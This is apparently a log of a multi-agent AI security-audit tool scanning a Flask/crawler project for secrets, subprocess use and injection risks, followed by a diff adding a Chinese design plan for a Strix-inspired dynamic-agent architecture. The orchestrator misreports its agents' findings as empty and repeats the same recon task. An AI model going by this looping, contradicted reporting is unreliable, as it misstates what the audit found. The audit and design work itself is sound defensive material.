||||
Thought: 我已经看到了app.py的部分内容,这是一个Flask应用,用于管理多个Streamlit应用。我注意到一些潜在的安全问题:
|
||||
1. 硬编码的SECRET_KEY
|
||||
2. 使用subprocess模块启动子进程
|
||||
3. 文件操作可能存在路径遍历风险
|
||||
|
||||
让我继续查看配置文件,了解项目的配置情况,然后使用semgrep进行静态分析,这样可以更系统地发现潜在的安全问题。
|
||||
14:31:05
|
||||
Completed: read_file
|
||||
Analysis
|
||||
1ms
|
||||
14:31:18
|
||||
Analysis
|
||||
Thought: 我已经看到了config.py文件的部分内容,这是一个使用pydantic-settings的配置文件,包含多个API密钥和配置项。我注意到配置文件中有很多API密钥字段,这些如果被泄露会很危险。
|
||||
|
||||
现在我已经对项目有了基本了解,接下来我应该使用semgrep进行静态分析,这样可以系统地发现潜在的安全问题。semgrep可以检测多种漏洞类型,包括SQL注入、XSS、命令注入等。
|
||||
14:31:22
|
||||
Completed: semgrep_scan
|
||||
Analysis
|
||||
2406ms
|
||||
Input:
|
||||
{
|
||||
"rules": "auto",
|
||||
"max_results": 50
|
||||
}
|
||||
|
||||
Output:
|
||||
null
|
||||
14:31:27
|
||||
Analysis
|
||||
Thought: semgrep工具未安装,我需要使用其他工具进行安全分析。我可以使用pattern_match工具来检测常见的危险模式,或者使用bandit_scan(如果项目是Python的)。从项目结构来看,这是一个Python项目,所以我可以尝试使用bandit_scan。
|
||||
14:31:29
|
||||
Completed: bandit_scan
|
||||
Analysis
|
||||
4ms
|
||||
14:31:31
|
||||
Analysis
|
||||
Thought: 看来bandit工具也未安装。我需要使用其他方法进行安全分析。我可以使用pattern_match工具来检测常见的危险模式,或者使用search_code工具搜索特定的关键字。让我先使用pattern_match来检测一些常见的危险模式。
|
||||
|
||||
首先,我需要读取一些关键文件的内容,然后使用pattern_match进行分析。让我先读取MindSpider/main.py,因为从项目结构看,这似乎是一个主要组件。
|
||||
14:31:35
|
||||
Completed: read_file
|
||||
Analysis
|
||||
5ms
|
||||
14:31:57
|
||||
Analysis
|
||||
Thought: 我已经看到了MindSpider/main.py文件的部分内容,这是一个AI爬虫项目的主程序。我注意到一些潜在的安全问题:
|
||||
1. 使用了subprocess模块
|
||||
2. 数据库连接字符串构建
|
||||
3. 使用了pymysql和sqlalchemy进行数据库操作
|
||||
|
||||
让我继续读取这个文件的剩余部分,然后使用pattern_match工具来检测常见的危险模式。
|
||||
14:32:01
|
||||
Completed: read_file
|
||||
Analysis
|
||||
1ms
|
||||
14:32:03
|
||||
Analysis
|
||||
Thought: 我已经看到了MindSpider/main.py文件的更多内容,这个文件使用了subprocess模块来执行其他Python脚本,这可能是命令注入的风险点。现在让我使用pattern_match工具来检测常见的危险模式,包括SQL注入、命令注入、路径遍历等。
|
||||
14:32:41
|
||||
Completed: pattern_match
|
||||
Analysis
|
||||
4ms
|
||||
14:32:42
|
||||
Analysis
|
||||
Thought: pattern_match工具没有检测到已知的危险模式,但我注意到代码中使用了subprocess.run来执行命令,这仍然是一个潜在的安全风险。让我继续检查其他关键文件,特别是那些处理用户输入或执行外部命令的文件。
|
||||
|
||||
让我先检查MindSpider/DeepSentimentCrawling/main.py文件,因为从项目结构看,这似乎是另一个主要组件。
|
||||
14:32:46
|
||||
Completed: read_file
|
||||
Analysis
|
||||
2ms
|
||||
14:32:47
|
||||
Analysis
|
||||
Thought: 我已经看到了MindSpider/DeepSentimentCrawling/main.py文件的部分内容,这是一个爬虫模块。我注意到它使用了PlatformCrawler来执行爬取任务,这可能涉及网络请求。让我继续查看这个文件的剩余部分,然后检查platform_crawler.py文件,因为它可能包含更多的安全敏感代码。
|
||||
14:32:51
|
||||
Completed: read_file
|
||||
Analysis
|
||||
0ms
|
||||
14:32:52
|
||||
Analysis
|
||||
Thought: 我已经看到了MindSpider/DeepSentimentCrawling/main.py文件的完整内容,这是一个爬虫模块,它使用了PlatformCrawler来执行爬取任务。现在我需要检查platform_crawler.py文件,因为它可能包含更多的安全敏感代码,特别是网络请求和用户输入处理部分。
|
||||
14:32:55
|
||||
Completed: read_file
|
||||
Analysis
|
||||
1ms
|
||||
14:32:57
|
||||
Analysis
|
||||
Thought: 我已经看到了platform_crawler.py文件的部分内容,这个文件负责配置和调用MediaCrawler进行多平台爬取。我注意到一些潜在的安全问题:
|
||||
1. 使用subprocess模块执行外部命令
|
||||
2. 文件操作可能存在路径遍历风险
|
||||
3. 数据库配置信息被硬编码写入文件
|
||||
|
||||
让我继续查看这个文件的剩余部分,然后使用search_code工具搜索一些特定的危险模式,如eval、exec、subprocess等。
|
||||
14:33:01
|
||||
Completed: read_file
|
||||
Analysis
|
||||
20ms
|
||||
14:33:03
|
||||
Analysis
|
||||
Thought: 我已经看到了platform_crawler.py文件的更多内容,这个文件使用了subprocess.run来执行MediaCrawler的main.py脚本,这是一个潜在的安全风险。现在让我使用search_code工具搜索一些特定的危险模式,如eval、exec、subprocess等,以便更全面地发现潜在的安全问题。
|
||||
14:33:06
|
||||
Completed: search_code
|
||||
Analysis
|
||||
287ms
|
||||
14:33:07
|
||||
Analysis
|
||||
Thought: 我发现了多个使用subprocess的地方,这些是潜在的安全风险点。现在让我搜索其他危险模式,如eval、exec、query等,以便更全面地发现潜在的安全问题。
|
||||
14:33:10
|
||||
Completed: search_code
|
||||
Analysis
|
||||
200ms
|
||||
14:33:11
|
||||
Analysis
|
||||
Thought: 我发现了一些使用eval的地方,大多数是Playwright的page.evaluate方法,用于在浏览器中执行JavaScript代码。这些通常是安全的,因为它们是在浏览器上下文中执行的。现在让我搜索exec和其他潜在的危险模式。
|
||||
14:33:14
|
||||
Completed: search_code
|
||||
Analysis
|
||||
157ms
|
||||
14:33:16
|
||||
Analysis
|
||||
Thought: 我发现了一些使用exec的地方,大多数是数据库操作或执行外部命令。现在让我搜索query和其他潜在的危险模式,特别是SQL查询相关的代码。
|
||||
14:33:18
|
||||
Completed: search_code
|
||||
Analysis
|
||||
5ms
|
||||
14:33:20
|
||||
Analysis
|
||||
Thought: 我已经搜索了subprocess、eval、exec和query等关键字,发现了一些潜在的安全风险点。现在让我使用dataflow_analysis工具来分析一些关键的数据流,特别是用户输入如何流向可能危险的函数。
|
||||
14:33:27
|
||||
Completed: dataflow_analysis
|
||||
Analysis
|
||||
65427ms
|
||||
14:34:34
|
||||
Analysis
|
||||
让我继续分析其他潜在的安全风险点。我将检查一些关键的Python文件,看看是否有明显的安全问题。
|
||||
14:34:36
|
||||
Completed: read_file
|
||||
Analysis
|
||||
6ms
|
||||
14:34:38
|
||||
Analysis
|
||||
Thought: 我已经看到了keyword_manager.py文件的部分内容,这个文件负责管理关键词和数据库操作。我注意到它使用了SQLAlchemy进行数据库操作,并且使用了参数化查询,这有助于防止SQL注入。让我继续查看这个文件的剩余部分,然后检查其他可能存在安全问题的文件。
|
||||
14:34:42
|
||||
Completed: read_file
|
||||
Analysis
|
||||
2ms
|
||||
14:35:04
|
||||
Analysis
|
||||
Thought: 我已经看到了keyword_manager.py文件的完整内容,这个文件使用了SQLAlchemy进行数据库操作,并且使用了参数化查询,这有助于防止SQL注入。现在让我检查.env.example文件,看看是否有敏感信息泄露的风险。
|
||||
14:35:07
|
||||
Completed: read_file
|
||||
Analysis
|
||||
5ms
|
||||
14:35:09
|
||||
Analysis
|
||||
Thought: 我已经看到了.env.example文件,这是一个环境变量配置示例文件,包含了各种API密钥和配置项。这个文件本身不包含敏感信息,因为它只是示例,但需要注意在实际使用时,.env文件可能包含敏感信息。
|
||||
|
||||
现在让我使用gitleaks_scan工具来检查代码中是否有密钥泄露或其他敏感信息。
|
||||
14:35:12
|
||||
Completed: gitleaks_scan
|
||||
Analysis
|
||||
73ms
|
||||
14:35:18
|
||||
Analysis
|
||||
Thought: 由于gitleaks工具未安装,我无法使用它来检测密钥泄露。让我使用search_code工具搜索一些常见的敏感信息模式,如API密钥、密码等。
|
||||
14:35:20
|
||||
Completed: search_code
|
||||
Analysis
|
||||
31ms
|
||||
14:35:22
|
||||
Analysis
|
||||
Thought: 我已经搜索了api_key关键字,发现了很多API密钥的配置。这些API密钥是通过环境变量或配置文件管理的,这是好的做法。现在让我搜索一些其他可能的敏感信息,如密码、密钥等。
|
||||
14:35:25
|
||||
Completed: search_code
|
||||
Analysis
|
||||
460ms
|
||||
14:35:27
|
||||
Analysis
|
||||
Thought: 我已经搜索了password关键字,发现了很多数据库密码的配置。这些密码是通过环境变量或配置文件管理的,这是好的做法。现在让我总结一下我的分析结果,并提供一个安全漏洞报告。
|
||||
|
||||
基于我的分析,我发现了以下潜在的安全问题:
|
||||
|
||||
1. 使用subprocess执行外部命令 - 在多个文件中发现
|
||||
2. 硬编码的SECRET_KEY - 在app.py中
|
||||
3. 数据库配置信息被硬编码写入文件 - 在platform_crawler.py中
|
||||
4. 使用Playwright的page.evaluate执行JavaScript代码 - 在多个爬虫客户端中
|
||||
|
||||
让我使用think工具来总结我的分析结果。
|
||||
14:35:44
|
||||
Completed: think
|
||||
Analysis
|
||||
0ms
|
||||
14:35:54
|
||||
Analysis
|
||||
Thought: 基于我的分析,我现在可以提供一个完整的安全漏洞报告。我将使用Final Answer格式来总结我的发现。
|
||||
14:36:51
|
||||
Analysis
|
||||
Thought: 我需要使用正确的工具格式来输出我的分析结果。让我使用think工具来总结我的分析,然后提供最终的安全漏洞报告。
|
||||
14:37:02
|
||||
Completed: think
|
||||
Analysis
|
||||
0ms
|
||||
14:37:05
|
||||
Analysis
|
||||
Thought: 我已经完成了对项目的安全分析,并记录了我的评估结果。现在我将使用reflect工具来总结我的分析进展和发现。
|
||||
14:37:26
|
||||
Completed: reflect
|
||||
Analysis
|
||||
165ms
|
||||
14:37:35
|
||||
Analysis
|
||||
Thought: 我已经完成了对项目的安全分析,并记录了我的发现和评估。现在我将总结我的分析结果,并提供一个完整的安全漏洞报告。
|
||||
|
||||
基于我的分析,我发现了以下潜在的安全问题:
|
||||
|
||||
1. **命令注入风险**:在多个文件中使用subprocess.run执行外部命令,包括app.py、MindSpider/main.py和platform_crawler.py。虽然当前命令参数是硬编码的,但如果未来修改为接受用户输入,可能存在命令注入风险。
|
||||
|
||||
2. **硬编码的SECRET_KEY**:在app.py第36行,Flask应用的SECRET_KEY是硬编码的,这降低了密钥的安全性。
|
||||
|
||||
3. **数据库配置信息硬编码写入文件**:在platform_crawler.py中,数据库配置信息被硬编码写入MediaCrawler的配置文件中,这可能导致敏感信息泄露。
|
||||
|
||||
4. **JavaScript代码执行**:在多个爬虫客户端中使用Playwright的page.evaluate方法执行JavaScript代码,虽然这些通常是在浏览器上下文中执行的,但如果用户输入被不当处理,可能存在XSS风险。
|
||||
|
||||
总体而言,项目在敏感信息管理方面做得较好,使用了参数化查询防止SQL注入,但需要注意subprocess使用和硬编码密钥的问题。
|
||||
14:37:51
|
||||
Analysis
|
||||
Action
|
||||
14:37:59
|
||||
Completed: think
|
||||
Analysis
|
||||
19ms
|
||||
14:37:59
|
||||
✅ analysis Agent 完成
|
||||
Orchestrator
|
||||
14:38:00
|
||||
Orchestrator
|
||||
Thought: analysis Agent 也没有返回任何有用的信息。这可能是因为项目文件结构复杂,或者 Agent 需要更具体的指导。我将尝试一个更直接的方法,先查看项目的根目录文件,特别是配置文件和主要入口文件,然后再进行深入分析。
|
||||
14:38:05
|
||||
📤 调度 recon Agent: 查看项目根目录下的所有文件,特别关注config.py, app.py, report_engine_only.py, requirements.txt等关键文件...
|
||||
Orchestrator
|
||||
14:38:15
|
||||
Recon
|
||||
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和主要文件。这将帮助我识别项目类型、技术栈和可能的入口点。我将从列出根目录开始。
|
||||
14:38:38
|
||||
Completed: list_files
|
||||
Recon
|
||||
15ms
|
||||
14:38:39
|
||||
Recon
|
||||
Thought: 从文件列表中,我可以看到这是一个包含多个组件的项目,主要有:
|
||||
1. MediaEngine - 一个Python模块,包含LLM相关功能
|
||||
2. MindSpider - 一个爬虫项目,包含DeepSentimentCrawling组件
|
||||
3. 一些根级别的Python文件如app.py, config.py等
|
||||
|
||||
我需要进一步了解项目的技术栈和结构。首先,我应该查看根目录下的配置文件,如requirements.txt、package.json等,以了解项目依赖和使用的框架。
|
||||
14:38:44
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:38:45
|
||||
Recon
|
||||
Thought: 从requirements.txt文件中,我可以看到这是一个舆情分析系统,使用了多种技术栈:
|
||||
1. Web框架:Flask, FastAPI, Streamlit
|
||||
2. 数据库:MySQL, PostgreSQL, SQLite, Redis
|
||||
3. 爬虫技术:Playwright, BeautifulSoup等
|
||||
4. LLM集成:OpenAI API
|
||||
5. 数据处理:pandas, numpy等
|
||||
|
||||
现在我需要查看MindSpider/DeepSentimentCrawling/MediaCrawler目录下的package.json文件,以了解前端依赖。
|
||||
14:38:51
|
||||
Completed: read_file
|
||||
Recon
|
||||
8ms
|
||||
14:38:52
|
||||
Recon
|
||||
Thought: package.json文件显示这是一个使用VitePress的文档项目,没有前端应用依赖。现在我需要查看主要的入口点文件,如app.py、MindSpider/main.py等,以了解应用程序的入口点和主要功能。
|
||||
14:38:55
|
||||
Completed: read_file
|
||||
Recon
|
||||
3ms
|
||||
14:38:57
|
||||
Recon
|
||||
Thought: app.py文件很长,我需要继续查看更多内容来了解应用程序的主要功能和入口点。让我继续读取文件的剩余部分。
|
||||
14:39:20
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:39:21
|
||||
Recon
|
||||
Thought: 我需要继续查看app.py文件的更多内容,特别是路由定义部分,以了解应用程序的API端点。让我继续读取文件的后续部分。
|
||||
14:39:24
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:39:45
|
||||
Recon
|
||||
Thought: 我需要继续查看app.py文件,特别是路由定义部分,以了解应用程序的API端点。让我继续读取文件的后续部分。
|
||||
14:39:50
|
||||
Completed: read_file
|
||||
Recon
|
||||
6ms
|
||||
14:40:57
|
||||
Recon
|
||||
Thought: 我需要继续查看app.py文件的最后部分,以了解所有的API路由。让我读取文件的剩余部分。
|
||||
14:41:04
|
||||
Completed: read_file
|
||||
Recon
|
||||
23ms
|
||||
14:41:37
|
||||
Recon
|
||||
Thought: 我需要查看app.py文件的最后部分,以了解所有的API路由。让我读取文件的最后部分。
|
||||
14:41:40
|
||||
Completed: read_file
|
||||
Recon
|
||||
5ms
|
||||
14:42:03
|
||||
Recon
|
||||
Thought: 现在我已经查看了app.py文件,了解了主要的API路由和应用程序结构。接下来,我需要查看MindSpider/main.py文件,以了解爬虫组件的主要功能。
|
||||
14:42:08
|
||||
Completed: read_file
|
||||
Recon
|
||||
3ms
|
||||
14:42:16
|
||||
Recon
|
||||
Thought: 我需要继续查看MindSpider/main.py文件的剩余部分,以了解爬虫组件的主要功能。
|
||||
14:42:18
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:43:42
|
||||
Recon
|
||||
Thought: 我需要继续查看MindSpider/main.py文件的剩余部分,以了解爬虫组件的主要功能。
|
||||
14:43:45
|
||||
Completed: read_file
|
||||
Recon
|
||||
4ms
|
||||
14:43:48
|
||||
Recon
|
||||
Thought: 现在我已经查看了MindSpider/main.py文件,了解了爬虫组件的主要功能。接下来,我需要查看配置文件,以了解项目的配置结构和敏感信息。
|
||||
14:43:51
|
||||
Completed: read_file
|
||||
Recon
|
||||
5ms
|
||||
14:43:53
|
||||
Recon
|
||||
Thought: 我需要继续查看config.py文件的剩余部分,以了解项目的完整配置结构。
|
||||
14:43:55
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:43:57
|
||||
Recon
|
||||
Thought: 现在我已经查看了config.py文件,了解了项目的配置结构。接下来,我需要查看.env.example文件,以了解环境变量的配置示例。
|
||||
14:44:00
|
||||
Completed: read_file
|
||||
Recon
|
||||
14ms
|
||||
14:44:00
|
||||
✅ recon Agent 完成
|
||||
Orchestrator
|
||||
14:44:00
|
||||
Orchestrator
|
||||
Thought: 多次尝试使用 recon 和 analysis Agent 都没有返回任何有用的信息。这可能是因为项目结构复杂或者 Agent 无法正确访问文件。我将尝试一个更直接的方法,先查看项目的根目录文件,特别关注配置文件和主要入口文件,然后再进行深入分析。
|
||||
14:44:04
|
||||
📤 调度 recon Agent: 查看项目根目录下的所有文件,特别关注config.py, app.py, report_engine_only.py, requirements.txt等关键文件...
|
||||
Orchestrator
|
||||
14:45:23
|
||||
Recon
|
||||
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和主要文件。这将帮助我识别项目类型、技术栈和关键组件。我将从列出根目录的内容开始。
|
||||
14:45:26
|
||||
Completed: list_files
|
||||
Recon
|
||||
2ms
|
||||
14:46:04
|
||||
Recon
|
||||
Thought: 我已经看到了项目的根目录结构。这是一个多引擎的项目,包含多个子模块如ForumEngine、InsightEngine、MediaEngine等。我注意到根目录下有app.py和config.py,这表明这可能是一个Python项目。接下来,我应该查看requirements.txt文件来了解项目的依赖和技术栈,同时也要查看config.py来了解项目配置。
|
||||
14:46:07
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:46:08
|
||||
Recon
|
||||
Thought: 从requirements.txt文件可以看出,这是一个基于Python的舆情分析系统,使用了多种技术栈:
|
||||
1. Web框架:Flask、Streamlit、FastAPI
|
||||
2. 数据库:MySQL (pymysql, aiomysql)、SQLite (aiosqlite)、Redis、PostgreSQL (asyncpg)
|
||||
3. 数据处理:pandas, numpy, jieba (中文分词)
|
||||
4. 机器学习:torch, transformers, sentence-transformers等
|
||||
5. 爬虫:playwright, beautifulsoup4等
|
||||
6. 可视化:plotly, matplotlib, wordcloud
|
||||
|
||||
接下来,我应该查看config.py文件来了解项目的配置信息,然后查看app.py作为主入口点。
|
||||
14:46:14
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:46:15
|
||||
Recon
|
||||
Thought: 从config.py文件可以看出,这是一个复杂的舆情分析系统,包含多个AI代理引擎(Insight Engine、Media Engine、Query Engine、Report Engine、MindSpider等)。系统使用Flask作为Web框架,支持多种数据库(MySQL、PostgreSQL),并集成了多个LLM API(如Kimi、Gemini、DeepSeek等)。
|
||||
|
||||
接下来,我应该查看app.py文件,这是主入口点,可以了解系统的路由和主要功能。
|
||||
14:46:18
|
||||
Completed: read_file
|
||||
Recon
|
||||
|
|
@ -0,0 +1,527 @@
|
|||
DeepAudit Agent 架构重构升级方案
|
||||
一、现状分析
|
||||
当前 DeepAudit 架构特点
|
||||
DeepAudit 目前采用基于 LangGraph 的固定流程图架构。整个审计流程按照 Recon(信息收集)→ Analysis(漏洞分析)→ Verification(漏洞验证)→ Report(报告生成)的线性顺序执行。每个阶段由一个专门的 Agent 负责,Agent 之间通过 TaskHandoff 机制传递结构化的上下文信息。
|
||||
|
||||
这种架构的优点是流程清晰、易于理解和调试,但存在几个明显的局限性:
|
||||
|
||||
第一,流程过于固定。无论面对什么类型的项目或漏洞,都必须走完整个流程,无法根据实际发现动态调整策略。比如发现了一个 SQL 注入线索,无法立即深入分析,必须等待 Analysis 阶段统一处理。
|
||||
|
||||
第二,Agent 专业化程度不足。Analysis Agent 需要同时处理所有类型的漏洞,从 SQL 注入到 XSS 到 SSRF,这导致系统提示词过于庞大,LLM 难以在每种漏洞类型上都表现出专家级水平。
|
||||
|
||||
第三,缺乏动态协作能力。Agent 之间只能按照预设的顺序传递信息,无法根据需要动态创建新的 Agent 或在 Agent 之间进行实时通信。
|
||||
|
||||
Strix 架构的启示
|
||||
Strix 是一个开源的 AI 安全测试 Agent 项目,它采用了完全不同的架构理念。通过深入分析 Strix 的设计,我们可以获得以下关键启示:
|
||||
|
||||
Strix 的核心是动态 Agent 树结构。根 Agent 可以根据任务需要随时创建子 Agent,每个子 Agent 专注于特定的漏洞类型或任务。子 Agent 完成后向父 Agent 汇报结果,父 Agent 可以根据结果决定是否需要创建更多子 Agent 或进行其他操作。
|
||||
|
||||
Strix 的另一个亮点是模块化的专业知识系统。它为每种漏洞类型都准备了详细的 Jinja2 模板,包含该漏洞的检测方法、利用技术、绕过手段、验证步骤等专业知识。创建 Agent 时可以指定加载哪些知识模块,让 Agent 在特定领域具备专家级能力。
|
||||
|
||||
此外,Strix 还实现了 Agent 间的消息传递机制、完善的状态管理、工具的沙箱执行、LLM 调用优化等高级特性。
|
||||
|
||||
二、升级后的整体架构
|
||||
核心设计理念
|
||||
升级后的 DeepAudit 将采用"动态 Agent 协作 + 专业知识模块 + 智能编排"的三层架构。
|
||||
|
||||
最底层是专业知识模块层,包含各种漏洞类型、框架、技术栈的专业知识库。这些知识以模板形式存储,可以按需加载到 Agent 的系统提示词中。
|
||||
|
||||
中间层是 Agent 执行层,包含可动态创建和销毁的 Agent 实例。每个 Agent 都有完整的生命周期管理,可以执行任务、调用工具、与其他 Agent 通信。
|
||||
|
||||
最上层是智能编排层,负责根据审计目标和实时发现来协调整个审计流程,决定何时创建什么类型的 Agent,如何分配任务,何时结束审计。
|
||||
|
||||
动态 Agent 树
|
||||
与当前固定的四阶段流程不同,升级后的系统将采用动态 Agent 树结构。
|
||||
|
||||
审计开始时,系统创建一个根 Agent(Root Agent)。根 Agent 首先进行初步的信息收集,了解项目的技术栈、目录结构、入口点等基本信息。然后根据收集到的信息,根 Agent 决定需要创建哪些专业子 Agent。
|
||||
|
||||
例如,如果发现项目使用了 SQL 数据库,根 Agent 可能会创建一个专门的 SQL 注入检测 Agent;如果发现有用户输入直接渲染到页面的代码,可能会创建一个 XSS 检测 Agent;如果发现有 HTTP 请求的代码,可能会创建一个 SSRF 检测 Agent。
|
||||
|
||||
每个子 Agent 专注于自己的任务领域。当子 Agent 发现可疑的漏洞线索时,它可以进一步创建验证子 Agent 来确认漏洞是否真实存在。验证通过后,还可以创建报告子 Agent 来生成正式的漏洞报告。
|
||||
|
||||
这种树状结构的好处是:任务可以无限细分,每个 Agent 都能专注于自己擅长的领域;发现和验证可以并行进行,提高效率;根据实际情况动态调整策略,而不是机械地执行固定流程。
|
||||
|
||||
Agent 间通信机制
|
||||
升级后的系统将实现完善的 Agent 间通信机制。
|
||||
|
||||
每个 Agent 都有一个消息队列,其他 Agent 可以向这个队列发送消息。消息类型包括:查询消息(请求信息)、指令消息(要求执行某个操作)、信息消息(分享发现或状态)。
|
||||
|
||||
当 Agent 处于等待状态时,它会检查自己的消息队列。如果有新消息,Agent 会处理消息并可能恢复执行。这种机制使得 Agent 之间可以进行实时协作,而不仅仅是单向的结果传递。
|
||||
|
||||
例如,SQL 注入检测 Agent 在分析过程中发现某个函数可能存在问题,但需要了解这个函数的调用上下文。它可以向根 Agent 发送查询消息,请求提供相关信息。根 Agent 收到消息后,可以调用代码搜索工具获取信息,然后回复给 SQL 注入检测 Agent。
|
||||
|
||||
Agent 状态管理
|
||||
每个 Agent 都有完整的状态管理,状态信息包括:
|
||||
|
||||
基本信息:Agent 的唯一标识、名称、父 Agent 标识、创建时间等。
|
||||
|
||||
任务信息:当前任务描述、任务上下文、从父 Agent 继承的信息等。
|
||||
|
||||
执行状态:当前迭代次数、最大迭代限制、运行状态(运行中、等待中、已完成、失败、已停止)等。
|
||||
|
||||
对话历史:与 LLM 的完整对话记录,包括系统提示词、用户消息、助手回复等。
|
||||
|
||||
执行记录:已执行的动作列表、观察结果列表、错误记录等。
|
||||
|
||||
发现列表:该 Agent 发现的所有漏洞和可疑点。
|
||||
|
||||
这种完整的状态管理使得 Agent 可以被暂停和恢复,可以被序列化和持久化,也便于调试和审计。
|
||||
|
||||
三、专业知识模块系统
|
||||
模块化设计
|
||||
专业知识模块是升级后架构的核心创新之一。我们将为不同的漏洞类型、框架、技术栈创建专门的知识模块。
|
||||
|
||||
漏洞类型模块包括:SQL 注入、XSS、SSRF、IDOR、认证绕过、远程代码执行、路径遍历、XXE、CSRF、竞态条件、反序列化、业务逻辑漏洞等。每个模块都包含该漏洞类型的完整知识体系。
|
||||
|
||||
框架知识模块包括:FastAPI、Django、Flask、Express、Next.js、Spring、Laravel 等主流框架。每个模块包含该框架的安全特性、常见漏洞模式、最佳实践等。
|
||||
|
||||
技术栈模块包括:Supabase、Firebase、GraphQL、gRPC、WebSocket 等。每个模块包含该技术的安全考量和常见问题。
|
||||
|
||||
模块内容结构
|
||||
以 SQL 注入模块为例,它应该包含以下内容:
|
||||
|
||||
漏洞概述:SQL 注入的定义、危害、影响范围。
|
||||
|
||||
检测方法:错误型注入检测、布尔型注入检测、时间型注入检测、带外注入检测的具体技术和判断标准。
|
||||
|
||||
数据库特定知识:MySQL、PostgreSQL、MSSQL、Oracle 等不同数据库的特有语法、函数、利用技术。
|
||||
|
||||
绕过技术:WAF 绕过、过滤绕过、编码绕过等高级技术。
|
||||
|
||||
ORM 和查询构建器:各种 ORM 框架中容易出现 SQL 注入的 API 和模式。
|
||||
|
||||
验证步骤:如何确认漏洞真实存在,如何构造 PoC,如何评估影响。
|
||||
|
||||
误报识别:哪些情况容易被误判为 SQL 注入,如何排除误报。
|
||||
|
||||
修复建议:参数化查询、ORM 正确用法、输入验证等修复方案。
|
||||
|
||||
模块加载机制
|
||||
创建 Agent 时,可以指定该 Agent 需要加载哪些知识模块。系统会将这些模块的内容动态注入到 Agent 的系统提示词中。
|
||||
|
||||
为了控制提示词长度和保持 Agent 的专注度,每个 Agent 最多加载 5 个知识模块。这个限制迫使我们为每个 Agent 选择最相关的知识,而不是试图让一个 Agent 掌握所有知识。
|
||||
|
||||
模块之间可以有依赖关系。例如,FastAPI 框架模块可能依赖 Python 安全基础模块;GraphQL 模块可能依赖 API 安全基础模块。加载模块时会自动处理这些依赖。
|
||||
|
||||
四、工具系统升级
|
||||
统一的工具注册机制
|
||||
升级后的工具系统将采用装饰器模式进行统一注册。每个工具都需要提供:工具名称、功能描述、参数定义、返回值说明。
|
||||
|
||||
工具按类别组织,包括:文件操作类(读取文件、搜索文件、列出目录)、代码分析类(模式匹配、数据流分析、AST 分析)、外部扫描类(Semgrep、Bandit、Gitleaks 等)、验证执行类(沙箱命令执行、HTTP 请求)、协作类(创建子 Agent、发送消息、等待消息)、推理类(思考工具)、报告类(创建漏洞报告)。
|
||||
|
||||
Think 工具
|
||||
Think 工具是从 Strix 借鉴的关键创新。这是一个让 Agent 进行深度推理的工具,Agent 可以用它来:
|
||||
|
||||
分析复杂情况:当面对复杂的代码逻辑或不确定的漏洞线索时,Agent 可以调用 Think 工具进行深入思考。
|
||||
|
||||
规划下一步行动:在执行具体操作之前,先用 Think 工具规划策略。
|
||||
|
||||
评估发现的严重性:发现可疑点后,用 Think 工具评估其真实性和影响。
|
||||
|
||||
决定是否需要创建子 Agent:当任务变得复杂时,用 Think 工具分析是否需要分解任务。
|
||||
|
||||
Think 工具的输出会被记录到 Agent 的对话历史中,帮助 LLM 保持思路的连贯性。
|
||||
|
||||
漏洞报告工具
|
||||
漏洞报告工具是正式记录漏洞的唯一方式。只有通过这个工具创建的漏洞才会被计入最终报告。这个设计确保了漏洞报告的规范性和完整性。
|
||||
|
||||
报告工具要求提供完整的漏洞信息:漏洞类型、严重程度、标题、详细描述、文件位置、代码片段、PoC、影响分析、修复建议等。
|
||||
|
||||
通常只有专门的报告 Agent 才会调用这个工具,确保漏洞在被正式报告之前已经经过了充分的验证。
|
||||
|
||||
沙箱执行
|
||||
涉及代码执行或网络请求的工具都在沙箱环境中运行。沙箱提供资源隔离(CPU、内存、网络限制)、文件系统隔离、超时控制等安全保障。
|
||||
|
||||
沙箱执行通过 Tool Server 机制实现。Agent 发送工具调用请求到 Tool Server,Tool Server 在沙箱中执行工具并返回结果。这种设计使得即使工具执行出现问题,也不会影响主系统的稳定性。
|
||||
|
||||
五、LLM 调用优化
|
||||
Prompt Caching
|
||||
对于支持 Prompt Caching 的 LLM(如 Anthropic Claude),系统会自动为系统提示词和早期对话添加缓存标记。这样在多轮对话中,这些内容只需要处理一次,后续调用可以直接使用缓存,显著降低 Token 消耗和响应延迟。
|
||||
|
||||
缓存策略会根据对话长度动态调整。对于短对话,只缓存系统提示词;对于长对话,会在关键位置添加多个缓存点。
|
||||
|
||||
Memory Compression
|
||||
当对话历史变得很长时,系统会自动进行压缩。压缩策略包括:
|
||||
|
||||
移除冗余信息:重复的工具调用结果、过长的代码输出等会被截断或摘要。
|
||||
|
||||
合并相似消息:连续的同类型消息可能被合并。
|
||||
|
||||
保留关键信息:重要的发现、决策点、错误信息等会被优先保留。
|
||||
|
||||
压缩后的对话历史仍然保持语义完整性,LLM 可以理解之前发生了什么,但 Token 消耗大大降低。
|
||||
|
||||
智能重试
|
||||
LLM 调用可能因为各种原因失败:网络问题、速率限制、服务不可用等。系统实现了智能重试机制:
|
||||
|
||||
对于可重试的错误(如速率限制),会等待适当时间后重试。
|
||||
|
||||
对于不可重试的错误(如认证失败),会立即报错并提供清晰的错误信息。
|
||||
|
||||
重试时会使用指数退避策略,避免对 LLM 服务造成过大压力。
|
||||
|
||||
六、审计流程重构
|
||||
启动阶段
|
||||
用户发起审计请求后,系统首先创建根 Agent。根 Agent 加载通用的安全审计知识模块和项目相关的框架知识模块。
|
||||
|
||||
根 Agent 的第一个任务是信息收集:扫描项目目录结构、识别技术栈、找出入口点、分析依赖关系。这个阶段类似于当前的 Recon 阶段,但更加灵活。
|
||||
|
||||
任务分解阶段
|
||||
根据信息收集的结果,根 Agent 决定如何分解审计任务。它会考虑:
|
||||
|
||||
项目使用了哪些技术?需要创建哪些专业 Agent?
|
||||
|
||||
有哪些高风险区域?应该优先分析哪些部分?
|
||||
|
||||
项目规模如何?需要多少并行 Agent?
|
||||
|
||||
根 Agent 会创建一批初始的子 Agent,每个子 Agent 负责特定的漏洞类型或代码区域。
|
||||
|
||||
并行分析阶段
|
||||
多个子 Agent 并行工作,各自在自己的专业领域进行深入分析。
|
